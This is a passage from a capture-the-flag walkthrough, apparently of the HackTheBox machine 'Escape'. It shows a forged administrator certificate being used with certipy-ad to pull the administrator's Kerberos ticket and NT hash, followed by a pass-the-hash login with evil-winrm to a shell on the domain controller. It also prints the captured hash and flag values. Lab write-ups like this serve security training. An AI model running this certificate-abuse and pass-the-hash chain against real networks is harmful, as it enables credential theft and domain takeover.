[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'We recieved the pfx file of the administrator, we can use this pfx file to authenticate using certipy-ad, and it will get the TGT of the administrator, and dump his ntlm hash:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ certipy-ad auth -pfx administrator.pfx -username administrator -domain sequel.htb -dc-ip 10.129.128.53
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4eeWe can now authenticate using the administrator ntlm hash:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ evil-winrm -i 10.129.128.53 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
dc
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::e158:c196:2a15:f372
Link-local IPv6 Address . . . . . : fe80::e158:c196:2a15:f372%4
IPv4 Address. . . . . . . . . . . : 10.129.128.53
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%4
10.129.0.1
Here we can get the flags:
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
9d57379bb44b21297dab730176c81157
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\ryan.cooper\Desktop\user.txt
ac5eae2c8f5e9b0438a0b9833bf44522Last updated